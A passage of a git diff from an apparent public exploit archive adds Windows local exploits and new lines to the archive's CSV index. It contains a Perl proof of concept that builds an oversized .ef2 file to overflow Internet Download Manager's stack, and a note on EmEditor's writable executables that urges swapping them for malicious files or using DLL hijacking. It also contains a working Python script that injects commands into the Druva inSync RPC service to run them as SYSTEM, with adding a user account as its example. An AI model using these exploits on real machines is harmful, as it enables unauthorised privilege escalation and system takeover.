referer: https://www.vulnerability-lab.com/
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
|
||||||
|
>
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Exploit
|
||||||
|
#!/usr/bin/perl
|
||||||
|
# Local Stack Buffer Overflow Exploit for Internet Download Manager
|
||||||
|
v6.37.11.1
|
||||||
|
# Vulnerability Laboratory - Benjamin Kunz Mejri
|
||||||
|
my $poc = "bof_poc.ef2" ;
|
||||||
|
print "[+] Producing bof_poc.ef2 ..." ;
|
||||||
|
my $buff0=" "."<" x 1;
|
||||||
|
my $buff1=" n https://"."A" x 1024;
|
||||||
|
my $buff2=" n Referer:"."A" x 1024;
|
||||||
|
my $buff3=" n User Agent:"."A" x 1024;
|
||||||
|
my $buff4=" n ".">" x 1;
|
||||||
|
open(ef2, ">>$poc") or die "Cannot open $poc";
|
||||||
|
print ef2 $buff0;
|
||||||
|
print ef2 $buff1;
|
||||||
|
print ef2 $buff2;
|
||||||
|
print ef2 $buff3;
|
||||||
|
print ef2 $buff4;
|
||||||
|
close(ef2);
|
||||||
|
print "n[+] done !";
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability-Lab -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||||
|
Benjamin Kunz Mejri -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
67
exploits/windows/local/48398.txt
Normal file
67
exploits/windows/local/48398.txt
Normal file
|
@ -0,0 +1,67 @@
|
||||||
|
# Exploit Title: EmEditor 19.8 - Insecure File Permissions
|
||||||
|
# Date: 2020-04-27
|
||||||
|
# Exploit Author: SajjadBnd
|
||||||
|
# Vendor Homepage: https://www.emeditor.com/
|
||||||
|
# Software Link: https://support.emeditor.com/en/downloads/suggested
|
||||||
|
# Version: 19.8
|
||||||
|
# Tested on: Win10 Professional x64
|
||||||
|
|
||||||
|
[ Description ]
|
||||||
|
|
||||||
|
EmEditor is a fast, lightweight, yet extensible, easy-to-use text editor for Windows.
|
||||||
|
Both native 64-bit and 32-bit builds are available, and moreover,
|
||||||
|
the 64-bit includes separate builds for SSE2 (128-bit), AVX-2 (256-bit),
|
||||||
|
and AVX-512 (512-bit) instruction sets.
|
||||||
|
|
||||||
|
[ PoC ]
|
||||||
|
|
||||||
|
C:\Users\user\AppData\Local\Programs\EmEditor
|
||||||
|
λ icacls *.exe
|
||||||
|
|
||||||
|
ee128.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
ee256.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
ee512.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
EEAdmin.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
eehlpver.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
eeupdate.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
emedhtml.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
EmEditor.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
emedtray.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
emedws.exe NT AUTHORITY\SYSTEM:(F)
|
||||||
|
BUILTIN\Administrators:(F)
|
||||||
|
DESKTOP-K4UDI4I\user:(F)
|
||||||
|
|
||||||
|
Successfully processed 10 files; Failed processing 0 files
|
||||||
|
|
||||||
|
[ Exploit - Privilege Escalation ]
|
||||||
|
|
||||||
|
Replace any *.exe files with any executable
|
||||||
|
malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
|
||||||
|
- Also you can use DLL Hijacking technique(emonig.dll,emregexp.dll,emtoast.dll..) ;D
|
54
exploits/windows/local/48400.txt
Normal file
54
exploits/windows/local/48400.txt
Normal file
|
@ -0,0 +1,54 @@
|
||||||
|
# Exploit Title: Druva inSync Windows Client 6.5.2 - Local Privilege Escalation
|
||||||
|
# Date: 2020-04-28
|
||||||
|
# Exploit Author: Chris Lyne
|
||||||
|
# Vendor Homepage: druva.com
|
||||||
|
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
|
||||||
|
# Version: 6.5.2
|
||||||
|
# Tested on: Windows 10
|
||||||
|
# CVE : CVE-2019-3999
|
||||||
|
# See also: https://www.tenable.com/security/research/tra-2020-12
|
||||||
|
|
||||||
|
import socket
|
||||||
|
import struct
|
||||||
|
import sys
|
||||||
|
|
||||||
|
# Command injection in inSyncCPHwnet64 RPC service
|
||||||
|
# Runs as nt authority\system. so we have a local privilege escalation
|
||||||
|
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print "Usage: " + __file__ + " <quoted command to execute>"
|
||||||
|
print "E.g. " + __file__ + " \"net user /add tenable\""
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
ip = '127.0.0.1'
|
||||||
|
port = 6064
|
||||||
|
command_line = sys.argv[1]
|
||||||
|
|
||||||
|
# command gets passed to CreateProcessW
|
||||||
|
def make_wide(str):
|
||||||
|
new_str = ''
|
||||||
|
for c in str:
|
||||||
|
new_str += c
|
||||||
|
new_str += '\x00'
|
||||||
|
return new_str
|
||||||
|
|
||||||
|
hello = "inSync PHC RPCW[v0002]"
|
||||||
|
func_num = "\x05\x00\x00\x00" # 05 is to run a command
|
||||||
|
command_line = make_wide(command_line)
|
||||||
|
command_length = struct.pack('<i', len(command_line))
|
||||||
|
|
||||||
|
# send each request separately
|
||||||
|
requests = [ hello, func_num, command_length, command_line ]
|
||||||
|
|
||||||
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
sock.connect((ip, port))
|
||||||
|
|
||||||
|
i = 1
|
||||||
|
for req in requests:
|
||||||
|
print 'Sending request' + str(i)
|
||||||
|
sock.send(req)
|
||||||
|
i += 1
|
||||||
|
|
||||||
|
sock.close()
|
||||||
|
|
||||||
|
print "Done."
|
|
@ -11042,6 +11042,10 @@ id,file,description,date,author,type,platform,port
|
||||||
48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
|
48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
|
||||||
48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
|
48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
|
||||||
48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
|
48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
|
||||||
|
48396,exploits/windows/local/48396.txt,"Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path",2020-04-29,"Roberto Piña",local,windows,
|
||||||
|
48397,exploits/windows/local/48397.txt,"Internet Download Manager 6.37.11.1 - Stack Buffer Overflow (PoC)",2020-04-29,Vulnerability-Lab,local,windows,
|
||||||
|
48398,exploits/windows/local/48398.txt,"EmEditor 19.8 - Insecure File Permissions",2020-04-29,SajjadBnd,local,windows,
|
||||||
|
48400,exploits/windows/local/48400.txt,"Druva inSync Windows Client 6.5.2 - Local Privilege Escalation",2020-04-29,"Chris Lyne",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -42627,3 +42631,7 @@ id,file,description,date,author,type,platform,port
|
||||||
48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
|
48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
|
||||||
48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
|
48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
|
||||||
48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,
|
48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,
|
||||||
|
48393,exploits/php/webapps/48393.py,"Open-AudIT Professional 3.3.1 - Remote Code Execution",2020-04-29,Askar,webapps,php,
|
||||||
|
48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php,
|
||||||
|
48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios,
|
||||||
|
48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue